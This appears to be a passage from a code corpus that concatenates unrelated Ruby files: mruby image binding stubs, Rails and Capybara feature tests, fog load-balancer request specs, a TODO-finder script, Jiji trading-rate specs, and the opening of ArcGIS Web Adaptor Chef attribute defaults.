  # src/mruby_integration/image.cpp
  Image.new
end
# Copies an image to a new object
# @param image [Image]
# @return [Image]
def image_copy(image)
  # mrb_image_copy
  # src/mruby_integration/image.cpp
  Image.new
end
# Returns a subsection of an image
# @param image [Image]
# @param source [Rectangle]
# @return [Image]
def image_from_image(image, source)
  # mrb_image_from_image
  # src/mruby_integration/image.cpp
  Image.new
end
# Creates an image from the font
# @param font [Font] Which font to draw with
# @param text [String] The text to put on the screen
# @param font_size [Integer]
# @param font_padding [Integer]
# @param colour [Colour]
# @return [Image]
def image_text_ex(font, text, font_size, font_padding, colour)
  # mrb_image_text_ex
  # src/mruby_integration/image.cpp
  Image.new
end
# Resizes the image using a bicubic scaling algorithm. Useful for things like
# photos, not great for pixel art.
# @param image [Image]
# @param width [Integer]
# @param height [Integer]
# @return [nil]
def image_resize!(image, width, height)
  # mrb_image_resize
  # src/mruby_integration/image.cpp
  nil
end
# Resizes the image using a nearest-neighbour scaling algorithm. Useful for things like
# pixel art, not great for photos.
# @param image [Image]
# @param width [Integer]
# @param height [Integer]
# @return [nil]
def image_resize_nearest_neighbour!(image, width, height)
  # mrb_image_resize_nearest_neighbour
  # src/mruby_integration/image.cpp
  nil
end
# Crops the image to the section in the rectangle
# @param image [Image]
# @param rectangle [Rectangle]
# @return [nil]
def image_crop!(image, rectangle)
  # mrb_image_crop
  # src/mruby_integration/image.cpp
  nil
end
# Applies the alpha of the mask to the image
# @param image [Image]
# @param alpha_mask [Image]
# @return [nil]
def image_alpha_mask!(image, alpha_mask)
  # mrb_image_alpha_mask
  # src/mruby_integration/image.cpp
  nil
end
# Pre-multiplies the alpha for the image
# @param image [Image]
# @return [nil]
def image_alpha_premultiply!(image)
  # mrb_image_alpha_premultiply
  # src/mruby_integration/image.cpp
  nil
end
# Flips the image vertically
# @param image [Image]
# @return [nil]
def image_flip_vertical!(image)
  # mrb_image_flip_vertical
  # src/mruby_integration/image.cpp
  nil
end
# Generates mipmaps for the specified image
# @param image [Image]
# @return [nil]
def image_mipmaps!(image)
  # mrb_image_mipmaps
  # src/mruby_integration/image.cpp
  nil
end
# Flips the image horizontally
# @param image [Image]
# @return [nil]
def image_flip_horizontal!(image)
  # mrb_image_flip_horizontal
  # src/mruby_integration/image.cpp
  nil
end
# Rotates the image clockwise 90 degrees
# @param image [Image]
# @return [nil]
def image_rotate_cw!(image)
  # mrb_image_rotate_cw
  # src/mruby_integration/image.cpp
  nil
end
# Rotates the image counter-clockwise 90 degrees
# @param image [Image]
# @return [nil]
def image_rotate_ccw!(image)
  # mrb_image_rotate_ccw
  # src/mruby_integration/image.cpp
  nil
end
# Returns an Image object with the screen data
# @return [Image]
def get_screen_data()
  # mrb_get_screen_data
  # src/mruby_integration/image.cpp
  Image.new
end
| 22.19774 | 87 | 0.741665 |
21daea6ed354e434f13826d6a6f9fb212d2b98d8 | 2,459 | # coding: utf-8
require 'active_support/concern'
module ActsAsOrderedTree
module Hooks
# This AR-hook is used in Move transactions to update parent_id, position
# and other changed attributes using single SQL-query.
#
# @example
# class Category < ActiveRecord::Base
# include ActsAsOrderedTree::Hooks
# end
#
# category = Category.first
# category.hook_update do |update|
# update.scope = Category.where(:parent_id => category.parent_id)
# update.values = { :name => Arel.sql('CASE WHEN parent_id IS NULL THEN name ELSE name || name END') }
#
# # `update.update!` will be called instead of usual `AR::Persistence#update`
# record.save
# end
#
# @api private
module Update
extend ActiveSupport::Concern
included do
attr_accessor :__update_hook
# Since rails 4.0 :update_record is used for actual updates
# Since rails 4.0.x and 4.1.x (i really don't know which is x) :_update_record is used
method_name = [:update_record, :_update_record].detect { |m| private_method_defined?(m) } || :update
alias_method :update_without_hook, method_name
alias_method method_name, :update_with_hook
end
def hook_update
self.__update_hook = UpdateManager.new(self)
yield __update_hook
ensure
self.__update_hook = nil
end
private
def update_with_hook(*args)
if __update_hook
__update_hook.update!
else
update_without_hook(*args)
end
end
class UpdateManager
attr_reader :record
attr_accessor :scope, :values
def initialize(record)
@record = record
@values = {}
end
def update!
scope.update_all(to_sql)
record.reload
end
private
def to_sql
values.keys.map do |attr|
name = attr.is_a?(Arel::Attributes::Attribute) ? attr.name : attr.to_s
quoted = record.class.connection.quote_column_name(name)
"#{quoted} = (#{value_of(attr)})"
end.join(', ')
end
def value_of(attr)
value = values[attr]
value.respond_to?(:to_sql) ? value.to_sql : record.class.connection.quote(value)
end
end # class CustomUpdate
end # module Update
end # module Hooks
end # module ActsAsOrderedTree | 28.593023 | 110 | 0.611224 |
18f7a7b5919fd8943c3e4a12b6d6b5065d928b9d | 4,428 | # coding: utf-8
module FeatureTests
  module Action
    # High-level Capybara actions covering the PayPal marketplace flow:
    # connecting admin/seller accounts, requesting a listing, accepting the
    # request, and both parties marking the order completed.
    module Paypal
      extend Capybara::DSL
      extend RSpec::Matchers
      module_function
      # Connects the marketplace (admin) PayPal account and configures the
      # minimum price and transaction fee settings.
      def connect_marketplace_paypal(min_price: "2.0", commission: "5", min_commission: "1.0")
        topbar = FeatureTests::Section::Topbar
        paypal_preferences = FeatureTests::Page::AdminPaypalPreferences
        admin_sidebar = FeatureTests::Section::AdminSidebar
        onboarding_wizard = FeatureTests::Section::OnboardingWizard
        # Connect Paypal for admin
        topbar.navigate_to_admin
        admin_sidebar.click_payments_link
        paypal_preferences.connect_paypal_account
        expect(page).to have_content("PayPal account connected")
        paypal_preferences.edit_payment_general_preferences(min_price: min_price)
        paypal_preferences.click_button("Save settings")
        #paypal_preferences.change_paypal_settings
        paypal_preferences.edit_payment_transaction_fee_preferences(commission: commission, min_commission: min_commission)
        paypal_preferences.click_button("Save")
        onboarding_wizard.dismiss_dialog
        expect(page).to have_content("Transaction fee settings updated")
      end
      # Connects the currently logged-in seller's PayPal account and grants
      # the marketplace's commission-fee permission.
      def connect_seller_paypal
        topbar = FeatureTests::Section::Topbar
        settings_sidebar = FeatureTests::Section::UserSettingsSidebar
        paypal_preferences = FeatureTests::Page::UserSettingsPayments
        # Connect Paypal for seller
        topbar.open_user_menu
        topbar.click_settings
        settings_sidebar.click_payments_link
        paypal_preferences.connect_paypal_account
        expect(page).to have_content("PayPal account connected")
        # Grant commission fee
        paypal_preferences.grant_permission
        expect(page).to have_content("Hooray, everything is set up!")
      end
      # As the buyer: opens the listing, books it, and submits payment,
      # then waits until the transaction shows up as authorized.
      # @param expected_price [String, nil] if given, assert the shown total
      def request_listing(title:, expected_price: nil)
        home = FeatureTests::Page::Home
        listing = FeatureTests::Page::Listing
        listing_book = FeatureTests::Page::ListingBook
        topbar = FeatureTests::Section::Topbar
        worker = FeatureTests::Worker
        topbar.click_logo
        home.click_listing(title)
        listing.fill_in_booking_dates
        listing.click_request
        expect(page).to have_content("Buy #{title}")
        listing_book.fill_in_message("Snowman ☃ sells: #{title}")
        if expected_price.present?
          # listing.fill_in_booking_dates always selects a two day period
          # expect(page).to have_content("(2 days)")
          expect(listing_book.total_value).to have_content("$#{expected_price}")
        end
        listing_book.proceed_to_payment
        # Poll until async processing finishes; the page may re-render while
        # we poll, so stale-element errors are treated as "not ready yet".
        worker.work_until do
          begin
            page.has_content?("Payment authorized") &&
              page.has_content?("Snowman ☃ sells: #{title}")
          rescue Selenium::WebDriver::Error::StaleElementReferenceError
            false
          end
        end
      end
      # As the seller: accepts the pending request from the inbox.
      def accept_listing_request
        topbar = FeatureTests::Section::Topbar
        topbar.click_inbox
        # Inbox
        expect(page).to have_content("Waiting for you to accept the request")
        page.click_link("Payment authorized")
        # Transaction conversation page
        page.click_link("Accept request")
        # Order details page
        page.click_button("Accept")
        expect(page).to have_content("Request accepted")
        expect(page).to have_content("Payment successful")
      end
      # As the buyer: marks the order completed, skipping feedback.
      def buyer_mark_completed
        topbar = FeatureTests::Section::Topbar
        topbar.click_inbox
        # Transaction conversation page
        expect(page).to have_content("Waiting for you to mark the order completed")
        page.click_link("accepted the request, received payment for")
        page.click_link("Mark completed")
        choose("Skip feedback")
        page.click_button("Continue")
        expect(page).to have_content("Offer completed")
        expect(page).to have_content("Feedback skipped")
      end
      # As the seller: skips giving feedback on the completed order.
      def seller_mark_completed
        topbar = FeatureTests::Section::Topbar
        topbar.click_inbox
        # Transaction conversation page
        expect(page).to have_content("Waiting for you to give feedback")
        page.click_link("marked the order as completed")
        page.click_link("Skip feedback")
        expect(page).to have_content("Feedback skipped")
      end
    end
  end
end
| 32.8 | 123 | 0.678184 |
1d9d21a64b69e6993e9d67e654dfce613fd9f448 | 132 | class AddPublicToAccessLevel < ActiveRecord::Migration[4.2]
def change
add_column :access_levels, :public, :boolean
end
end
| 22 | 59 | 0.765152 |
f727580b3801994c9051d38169787a7e965ad463 | 3,778 | require 'test_helper'
# Request-level specs for the Telefonica LB health monitor API: schema of
# responses on the happy path, and NotFound errors for unknown ids.
describe "Fog::Network[:telefonica] | lb_health_monitor requests" do
  before do
    # Expected response schema: keys map to the classes their values must be.
    @lb_health_monitor_format = {
      'id' => String,
      'type' => String,
      'delay' => Integer,
      'timeout' => Integer,
      'max_retries' => Integer,
      'http_method' => String,
      'url_path' => String,
      'expected_codes' => String,
      'status' => String,
      'admin_state_up' => Fog::Boolean,
      'tenant_id' => String
    }
  end
  describe "success" do
    before do
      # Each example gets a fresh pool and a freshly created health monitor.
      @lb_pool = network.lb_pools.create(
        :subnet_id => 'subnet_id',
        :protocol => 'HTTP',
        :lb_method => 'ROUND_ROBIN'
      )
      type = 'PING'
      delay = 1
      timeout = 5
      max_retries = 10
      attributes = {
        :http_method => 'GET',
        :url_path => '/',
        :expected_codes => '200, 201',
        :admin_state_up => true,
        :tenant_id => 'tenant_id'
      }
      @lb_health_monitor = network.create_lb_health_monitor(
        type, delay, timeout, max_retries, attributes
      ).body
    end
    after do
      @lb_pool.destroy
    end
    it "#create_lb_health_monitor" do
      @lb_health_monitor.must_match_schema('health_monitor' => @lb_health_monitor_format)
    end
    it "#list_lb_health_monitors" do
      network.list_lb_health_monitors.body.
        must_match_schema('health_monitors' => [@lb_health_monitor_format])
    end
    it "#get_lb_health_monitor" do
      lb_health_monitor_id = network.lb_health_monitors.all.first.id
      network.get_lb_health_monitor(lb_health_monitor_id).body.
        must_match_schema('health_monitor' => @lb_health_monitor_format)
    end
    it "#update_lb_health_monitor" do
      lb_health_monitor_id = network.lb_health_monitors.all.first.id
      attributes = {
        :delay => 5,
        :timeout => 10,
        :max_retries => 20,
        :http_method => 'POST',
        :url_path => '/varz',
        :expected_codes => '200',
        :admin_state_up => false
      }
      network.update_lb_health_monitor(lb_health_monitor_id, attributes).body.
        must_match_schema('health_monitor' => @lb_health_monitor_format)
    end
    it "#associate_lb_health_monitor" do
      lb_health_monitor_id = network.lb_health_monitors.all.first.id
      network.associate_lb_health_monitor(@lb_pool.id, lb_health_monitor_id).status.must_equal 200
    end
    it "#disassociate_lb_health_monitor" do
      lb_health_monitor_id = network.lb_health_monitors.all.first.id
      network.disassociate_lb_health_monitor(@lb_pool.id, lb_health_monitor_id).status.must_equal 204
    end
    it "#delete_lb_health_monitor" do
      lb_health_monitor_id = network.lb_health_monitors.all.first.id
      network.delete_lb_health_monitor(lb_health_monitor_id).status.must_equal 204
    end
  end
  # Every operation raises NotFound for an id (0) that does not exist.
  describe "failure" do
    it "#get_lb_health_monitor" do
      proc do
        network.get_lb_health_monitor(0)
      end.must_raise Fog::Network::Telefonica::NotFound
    end
    it "#update_lb_health_monitor" do
      proc do
        network.update_lb_health_monitor(0, {})
      end.must_raise Fog::Network::Telefonica::NotFound
    end
    it "#associate_lb_health_monitor" do
      proc do
        network.associate_lb_health_monitor(0, 0)
      end.must_raise Fog::Network::Telefonica::NotFound
    end
    it "#disassociate_lb_health_monitor" do
      proc do
        network.disassociate_lb_health_monitor(0, 0)
      end.must_raise Fog::Network::Telefonica::NotFound
    end
    it "#delete_lb_health_monitor" do
      proc do
        network.delete_lb_health_monitor(0)
      end.must_raise Fog::Network::Telefonica::NotFound
    end
  end
end
| 29.286822 | 101 | 0.642668 |
edc586fbcff31fb0d6c07f0f88da14031922dd93 | 1,092 | # As aun unauthorized user
# I want to unsign pending reports
# In order to be able to update a report again
feature 'Unsign Report' do
  # A verified-but-unreleased report can be un-signed by its own signer,
  # which makes it updatable again.
  scenario 'when pending' do
    user = create(:unauthorized_user)
    login_as user, scope: :user
    report = create(:verified_report, user: user)
    expect(report).not_to be_updatable
    visit report_url(report)
    click_link 'Vidierung löschen'
    report.reload
    expect(report).to be_updatable
    expect(current_path).to eq report_path(report)
  end
  # Once a release exists, the unsign link must not be offered.
  scenario 'when released' do
    user = create(:unauthorized_user)
    login_as user, scope: :user
    report = create(:verified_report, user: user)
    create(:report_release, report: report)
    visit report_url(report)
    expect(page).not_to have_content('Vidierung löschen')
  end
  # A report signed by someone else cannot be unsigned by this user.
  scenario 'when signed by other user' do
    user = create(:unauthorized_user)
    other = create(:unauthorized_user)
    login_as user, scope: :user
    report = create(:verified_report, user: other)
    visit report_url(report)
    expect(page).not_to have_content('Vidierung löschen')
  end
end
| 27.3 | 57 | 0.718864 |
f8aa2ef562900de55b01e735045d53fe82a21e66 | 94 | json.extract! @employee_shift, :id, :company_shift_id, :employee_id, :created_at, :updated_at
| 47 | 93 | 0.787234 |
08c507c247823804c2366e2f6e58dca521eee292 | 2,170 | ##
## Executes a recursive grep in the current directory to find all todos,
## and the respective filename and line number. If there's a .gitignore
## that function will ignore all directories and files from .gitignore
##
# Returns an array of "file:line:match" strings.
# NOTE(review): .gitignore lines are spliced verbatim into a shell pipeline;
# blank lines, comments or quotes in .gitignore would corrupt the command.
def get_lines
  exclude = ''
  if File.file?(".gitignore")
    exclude = `cat .gitignore`.split("\n").map { |l| " | grep -v '^#{l}'" }
    exclude = exclude.join
  end
  `egrep -rnH 'TODO|FIXME|XXX' * | grep -v '^Binary file' #{exclude}`.split("\n")
end
##
## Builds a code sample from the given file and linenumber. Will display
## the 4 lines above and below the relevant line and will highlight the
## relevant line.
##
# Colorization (.bold/.red/.yellow) relies on String extensions provided
# elsewhere in the project.
def code_sample(file, line)
  line = line.to_i
  from = line - 4
  from = 0 if from < 0
  result = "\n\n"
  snippet(file, from, line + 4).split("\n").each do |code_line|
    # `from` tracks the line number being rendered; the target line gets
    # a ">> " marker and red highlighting.
    active = (line == from)
    spaces = " " * (8 - from.to_s.length - (active ? 3 : 0))
    result << spaces + (active ? '>> '.bold.red : '')
    result << from.to_s.bold.yellow + ": ".bold.yellow
    first = true
    if code_line.length > 0
      # Wrap long lines at 80 chars; continuation lines are indented to
      # line up under the code (original indent + gutter width).
      scan = code_line.scan(/^ +/)[0]
      ident = scan ? scan.length + 12 : 12
      code_line.scan(/.{1,80}/m).each do |l|
        result << (first ? '' : ' ' * ident) + (active ? l.bold.red : l) + "\n"
        first = false
      end
    else
      result << "\n"
    end
    from += 1
  end
  result
end
##
## Extracs a code snippet from a file and reduced the identation to the minimum
##
# Returns lines `from`..`to` (1-indexed, inclusive) of `file`, with tabs
# expanded and the smallest common leading-space run stripped.
def snippet(file, from, to)
  code = ""
  current_line = 0
  File.open(file, 'r') do |f|
    while read_line = f.gets
      current_line += 1
      code << read_line.gsub(/\t/m, ' ') if current_line >= from && current_line <= to
    end
  end
  # Strip the minimum indentation found across the collected lines.
  code.gsub(/^#{code.scan(/^ +/).min}/, '')
end
##
## Reduces the identation of a given string to the minimum
##
# BUGFIX: `scan` was previously called on the implicit receiver (`main`),
# not on `code`, so every call raised NoMethodError. The minimum leading
# whitespace run across lines is now taken from `code` itself; when there
# is no indentation the regex degenerates to /^/ and the string is
# returned unchanged.
def unindent(code)
  code.gsub(/^#{code.scan(/^\s+/).min}/, "")
end
##
## Registers the check script: formats every TODO/FIXME/XXX hit as a
## message with a highlighted code sample, then reports one at random.
##
check do
  messages = get_lines.map do |hit|
    # Each hit is "file:line:text"; only the first two fields are needed.
    file, lineno = hit.split(':', 3)
    "Found a ToDo in #{file} at line #{lineno}:\n" + code_sample(file, lineno)
  end
  messages.sample
end
| 20.666667 | 87 | 0.594931 |
e25f1d0f45d76a8d51ea66a0c9e0491f3f5c0cf6 | 2,873 | # frozen_string_literal: true
require 'jiji/test/test_configuration'
require 'jiji/test/data_builder'
# Specs for Jiji::Model::Trading::Rate — an OHLC (open/high/low/close)
# rate aggregated from ticks. The example descriptions are Japanese
# runtime strings and are kept verbatim; each is summarized in English
# in a comment above it. Tick values map to bid prices offset by 100
# with a fixed 0.003 bid/ask spread — presumably set up by
# data_builder.new_tick; confirm in the shared context.
describe Jiji::Model::Trading::Rate do
  include_context 'use data_builder'

  # "Can be created from ticks": the earliest/latest ticks become
  # open/close, the max/min ticks become high/low, and the timestamp is
  # the earliest tick's time.
  it 'tickから作成できる' do
    rate1 = Jiji::Model::Trading::Rate.create_from_tick(:EURJPY,
      data_builder.new_tick(1, Time.new(2014, 1, 1, 0, 0, 0)),
      data_builder.new_tick(2, Time.new(2014, 2, 1, 0, 0, 0)),
      data_builder.new_tick(3, Time.new(2014, 1, 1, 0, 0, 1)),
      data_builder.new_tick(10, Time.new(2014, 1, 10, 0, 0, 0)),
      data_builder.new_tick(-10, Time.new(2014, 1, 21, 0, 0, 0))
    )
    expect(rate1.pair).to eq(:EURJPY)
    expect(rate1.open.bid).to eq(101)
    expect(rate1.open.ask).to eq(101.003)
    expect(rate1.close.bid).to eq(102)
    expect(rate1.close.ask).to eq(102.003)
    expect(rate1.high.bid).to eq(110)
    expect(rate1.high.ask).to eq(110.003)
    expect(rate1.low.bid).to eq(90)
    expect(rate1.low.ask).to eq(90.003)
    expect(rate1.timestamp).to eq(Time.new(2014, 1, 1, 0, 0, 0))
  end

  # "Rates are considered equal when all values are equal": checks ==,
  # eql? (value equality) versus equal? (identity).
  it 'すべての値が同一である場合、同一とみなされる' do
    rate1 = data_builder.new_rate(1)
    rate2 = data_builder.new_rate(2)
    expect(rate1 == rate2).to eq(false)
    expect(rate1 == data_builder.new_rate(1)).to eq(true)
    expect(rate1.eql?(rate2)).to eq(false)
    expect(rate1.eql?(rate1)).to eq(true)
    expect(rate1.eql?(data_builder.new_rate(1))).to eq(true)
    expect(rate1.equal?(rate2)).to eq(false)
    expect(rate1.equal?(rate1)).to eq(true)
    expect(rate1.equal?(data_builder.new_rate(1))).to eq(false)
  end

  # "Can be duplicated with clone": the clone is value-equal but not the
  # same object.
  it 'clone で複製ができる' do
    rate1 = data_builder.new_rate(1)
    clone = rate1.clone
    expect(rate1 == clone).to eq(true)
    expect(rate1.eql?(clone)).to eq(true)
    expect(rate1.equal?(clone)).to eq(false)
  end

  # "Can be merged with union": open/close/high/low/timestamp are
  # recomputed across all ticks of the merged rates.
  it 'unionで統合できる' do
    rate1 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
      data_builder.new_tick(1, Time.new(2014, 1, 3, 0, 0, 0)),
      data_builder.new_tick(2, Time.new(2014, 2, 1, 0, 0, 0))
    )
    rate2 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
      data_builder.new_tick(4, Time.new(2014, 1, 1, 0, 0, 0)),
      data_builder.new_tick(5, Time.new(2014, 1, 2, 0, 0, 0))
    )
    rate3 = Jiji::Model::Trading::Rate.create_from_tick(:USDJPY,
      data_builder.new_tick(6, Time.new(2014, 4, 3, 0, 0, 0)),
      data_builder.new_tick(7, Time.new(2014, 3, 1, 0, 0, 0))
    )
    rate = Jiji::Model::Trading::Rate.union(rate1, rate2, rate3)
    expect(rate.pair).to eq(:USDJPY)
    expect(rate.open.bid).to eq(104)
    expect(rate.open.ask).to eq(104.003)
    expect(rate.close.bid).to eq(106)
    expect(rate.close.ask).to eq(106.003)
    expect(rate.high.bid).to eq(107)
    expect(rate.high.ask).to eq(107.003)
    expect(rate.low.bid).to eq(101)
    expect(rate.low.ask).to eq(101.003)
    expect(rate.timestamp).to eq(Time.new(2014, 1, 1, 0, 0, 0))
  end
end
| 35.036585 | 65 | 0.646711 |
e9b60aeab5ed66d960c04dee9550851ed1396861 | 10,793 | #
# Cookbook Name:: arcgis-enterprise
# Attributes:: webadaptor
#
# Copyright 2018 Esri
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Attribute defaults for the ArcGIS Web Adaptor component. All values live
# under node['arcgis']['web_adaptor']; the case branches below select
# platform- and version-specific setup archives, install paths, and
# (on Windows) MSI product GUIDs.
default['arcgis']['web_adaptor'].tap do |web_adaptor|
  web_adaptor['admin_access'] = false
  web_adaptor['install_system_requirements'] = true
  web_adaptor['setup_archive'] = ''
  web_adaptor['product_code'] = ''
  web_adaptor['product_code2'] = ''
  # Default path of the IIS configuration tool; overridden with a
  # version-qualified path for 10.7 and newer in the branches below.
  web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\Tools\\ConfigureWebAdaptor.exe'

  case node['platform']
  when 'windows'
    web_adaptor['setup'] = ::File.join(node['arcgis']['repository']['setups'],
                                       "ArcGIS #{node['arcgis']['version']}",
                                       'WebAdaptorIIS', 'Setup.exe').gsub('/', '\\')
    web_adaptor['lp-setup'] = node['arcgis']['web_adaptor']['setup']
    web_adaptor['install_dir'] = ''

    # Per-release setup archive and MSI product GUIDs. Two product codes
    # are tracked per release — presumably for the two Web Adaptor
    # instances an install can register; confirm against Esri docs.
    # Releases older than 10.7 log an "Unsupported" warning.
    case node['arcgis']['version']
    when '10.8.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'ArcGIS_Web_Adaptor_for_Microsoft_IIS_1081_175217.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{9695EF78-A2A8-4383-AFBF-627C55FE31DC}'
      web_adaptor['product_code2'] = '{56F26E70-2C61-45BC-A624-E100175086F7}'
      web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.8.1\\Tools\\ConfigureWebAdaptor.exe'
    when '10.8'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_108_172749.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{D6059C27-7199-4A94-806B-6C40EFD02828}'
      web_adaptor['product_code2'] = '{E77ED9CA-7DC8-45FC-A8BB-57AD2096EF8A}'
      web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.8\\Tools\\ConfigureWebAdaptor.exe'
    when '10.7.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_1071_169690.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{5ECEF84F-592C-47D1-B7C5-9F3D7E2AB7CE}'
      web_adaptor['product_code2'] = '{5F1D01EA-296E-4226-A704-6A90E2916782}'
      web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.7.1\\Tools\\ConfigureWebAdaptor.exe'
    when '10.7'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_107_167634.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{F343B520-F769-4D93-86D2-663168AC6975}'
      web_adaptor['product_code2'] = '{58A76431-E1A9-4D11-BB89-0D12C6E77C78}'
      web_adaptor['config_web_adaptor_exe'] = '\\ArcGIS\\WebAdaptor\\IIS\\10.7\\Tools\\ConfigureWebAdaptor.exe'
    when '10.6.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_1061_163981.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{1B4E7470-72F4-4169-92B9-EF1BDF8AE4AF}'
      web_adaptor['product_code2'] = '{3FA8B44E-E0E3-4245-A662-6B81E1E75048}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.6'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_106_161833.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{4FB9D475-9A23-478D-B9F7-05EBA2073FC7}'
      web_adaptor['product_code2'] = '{38DBD944-7F0E-48EB-9DCB-98A0567FB062}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.5.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_1051_156367.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{0A9DA130-E764-485F-8C1A-AD78B04AA7A4}'
      web_adaptor['product_code2'] = '{B8A6A873-ED78-47CE-A9B4-AB3192C47604}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.5'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_105_154007.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{87B4BD93-A5E5-469E-9224-8A289C6B2F10}'
      web_adaptor['product_code2'] = '{604CF558-B7E1-4271-8543-75E260080DFA}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.4.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_1041_151933.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{F53FEE2B-54DD-4A6F-8545-6865F4FBF6DC}'
      web_adaptor['product_code2'] = '{475ACDE5-D140-4F10-9006-C804CA93D2EF}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.4'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_for_Microsoft_IIS_104_149435.exe').gsub('/', '\\')
      web_adaptor['product_code'] = '{B83D9E06-B57C-4B26-BF7A-004BE10AB2D5}'
      web_adaptor['product_code2'] = '{E2C783F3-6F85-4B49-BFCD-6D6A57A2CFCE}'
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    else
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    end

    # All known Web Adaptor MSI product GUIDs across releases — presumably
    # used by the install/uninstall resources to detect existing installs;
    # confirm in the provider code.
    web_adaptor['product_codes'] = ['{B83D9E06-B57C-4B26-BF7A-004BE10AB2D5}',
                                    '{E2C783F3-6F85-4B49-BFCD-6D6A57A2CFCE}',
                                    '{F53FEE2B-54DD-4A6F-8545-6865F4FBF6DC}',
                                    '{475ACDE5-D140-4F10-9006-C804CA93D2EF}',
                                    '{87B4BD93-A5E5-469E-9224-8A289C6B2F10}',
                                    '{604CF558-B7E1-4271-8543-75E260080DFA}',
                                    '{0A9DA130-E764-485F-8C1A-AD78B04AA7A4}',
                                    '{B8A6A873-ED78-47CE-A9B4-AB3192C47604}',
                                    '{4FB9D475-9A23-478D-B9F7-05EBA2073FC7}',
                                    '{38DBD944-7F0E-48EB-9DCB-98A0567FB062}',
                                    '{1B4E7470-72F4-4169-92B9-EF1BDF8AE4AF}',
                                    '{3FA8B44E-E0E3-4245-A662-6B81E1E75048}',
                                    '{F343B520-F769-4D93-86D2-663168AC6975}',
                                    '{58A76431-E1A9-4D11-BB89-0D12C6E77C78}',
                                    '{5ECEF84F-592C-47D1-B7C5-9F3D7E2AB7CE}',
                                    '{5F1D01EA-296E-4226-A704-6A90E2916782}',
                                    '{D6059C27-7199-4A94-806B-6C40EFD02828}',
                                    '{E77ED9CA-7DC8-45FC-A8BB-57AD2096EF8A}',
                                    '{9695EF78-A2A8-4383-AFBF-627C55FE31DC}',
                                    '{56F26E70-2C61-45BC-A624-E100175086F7}']
  else # node['platform'] == 'linux'
    # On Linux the Java Web Adaptor is used; archives are tarballs and the
    # install goes under /arcgis/webadaptor<version>.
    web_adaptor['setup'] = ::File.join(node['arcgis']['repository']['setups'],
                                       node['arcgis']['version'],
                                       'WebAdaptor', 'Setup')
    web_adaptor['lp-setup'] = node['arcgis']['web_adaptor']['setup']

    case node['arcgis']['version']
    when '10.8.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'ArcGIS_Web_Adaptor_Java_Linux_1081_175313.tar.gz')
    when '10.8'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_108_172992.tar.gz')
    when '10.7.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_1071_169645.tar.gz')
    when '10.7'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_107_167720.tar.gz')
    when '10.6.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_1061_164057.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.6'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_106_161911.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.5.1'
      web_adaptor['setup_archive'] = ::File.join(node['arcgis']['repository']['archives'],
                                                 'Web_Adaptor_Java_Linux_1051_156442.tar.gz')
      Chef::Log.warn 'Unsupported ArcGIS Web Adaptor version'
    when '10.5'
